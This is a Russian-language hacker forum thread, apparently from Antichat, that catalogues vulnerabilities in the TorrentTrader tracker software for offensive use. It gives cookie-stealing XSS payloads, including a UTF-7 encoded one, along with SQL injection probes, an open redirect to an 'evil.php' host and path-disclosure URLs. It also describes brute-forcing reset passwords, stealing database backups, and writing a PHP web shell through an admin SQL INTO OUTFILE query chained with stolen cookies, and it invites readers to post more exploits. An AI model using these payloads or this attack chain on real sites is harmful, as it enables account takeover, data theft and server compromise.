![]() |
[ Обзор уязвимостей TorrentTrader ]
Уязвимости TorrentTrader Офф сайт разработчика: torrenttrader.org На сегодняшний день последняя версия: FINAL v1.08 Notes(2008-06-17) Скачать отсюда: http://sourceforge.net/project/showfiles.php?group_id=98584&package_id=180927&rel ease_id=545219 TorrentTrader – набирающий популярность торрент движок по размещению и скачиванию торрентов. Для начала рассмотрим публичные уязвимости под различные версии: TorrentTrader 1.0 SQL Inject Эксплойт: TorrentTrader 1.0 RC2 SQL Injection © By aCiDBiTS TorrentTrader Classic v1.07 Тут у нас пару XSS от хакиря «HACKERS PAL» Примеры: Код:
http://site.com/tracker/pjirc/css.php?color=<script>alert(document.cookie);</script>Код:
http://site.com/tracker/browse.php?cat=<script>alert(document.cookie);</script>1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "msg" в сценарии account-inbox.php. Удаленный пользователь может с помощью специально сформированного частного сообщения выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Код:
http://site.com/tracker/account-inbox.php?msg=<script>alert('XSS')</script>Пример: Код:
http://site.com/tracker/account-inbox.php?msg=<message>&receiver=<username>Пример: Код:
http://site.com/tracker/redirect.php?url=http://remote_host/evil.phpTorrentTrader версии 1.08 до 17.06.2008 1. Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "email" и "wantusername" в сценарии account-signup.php и в параметре "receiver" в сценарии account-inbox.php (когда установлен параметр "msg"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Примеры: Код:
http://site.com/tracker/account-signup.php?wantusername=’Код:
http://site.com/tracker/account-signup.php?email=’Код:
http://site.com/tracker/account-inbox.php?msg=’++++++++++++++ Теперь поинтереснее, баги найденные модератором античата gibson`om, для: TorrentTrader v2.04: 1. Раскрытие пути и системная информация check.php ps если админ его не удалил, а то маячит в админке, так что не вариант, что файл будет на сайте. 2. Слабый пароль. Меняем пасс через востановление и пасс меняется в диапозоне 10000 до 50000 только цифры. Можно написать брут на перле имхо идеальный вариант будет и перебрутить пасс. ps Нужно мыло пользователя! 3. Возможно "тырить" бекап бд backup-database.php buckup будет в /backups в формате $db-$year$month$day-$hour$min.gz ps если знаем название базы. 4. Xss В сообщениях все фильтруется, но если используется кодировка utf 7, то все поля подверженны ксс. Код:
+ADw-/title+AD4APA-script+AD4-alert(document.cookie)+ADsAPA-/script+AD4-xss при отправке репорта ([Report Torrent]), отправляем мессагу вставляем любые теги (активка). Мессага пойдет админу! [c] gibson ++++++++++++++ Ну и далее пару мелких багов найденных мною. TorrentTrader Classic Edition 1.08 XSS: Код:
http://site.com/tracker/account-inbox.php?receiver=<script>alert('Nightmare')</script>FINAL v1.08 Notes(2008-06-17) (скачал сегодня) Наткнулся на раскрытие пути: Код:
http://site.com/tracker/torrents-search.php?search=&cat[]=Код:
http://site.com/tracker/torrents-details.php?id[]=Кто ещё чем сможет дополнить, просьба публиковать различные сплойты, публичные, или найденные вами дырки. Как показывают опросы, этот движок пользуется спросом в локалках разных провайдеров, так что… так.. :) |
Заливка шелла через админку в последней версии FINAL v1.08 Notes(2008-06-17)
Идём в раздел "Database\База данных" Далее выполняем SQL запрос: Код:
SELECT '<? echo "shell"; ?>' FROM users INTO OUTFILE "/home/localhost/www/tt/shell.php"Далее, войти в админку можно утащив куки с помощью XSS, а получить полный путь до файла можно с помощью раскрытия пути. |
| Время: 23:21 |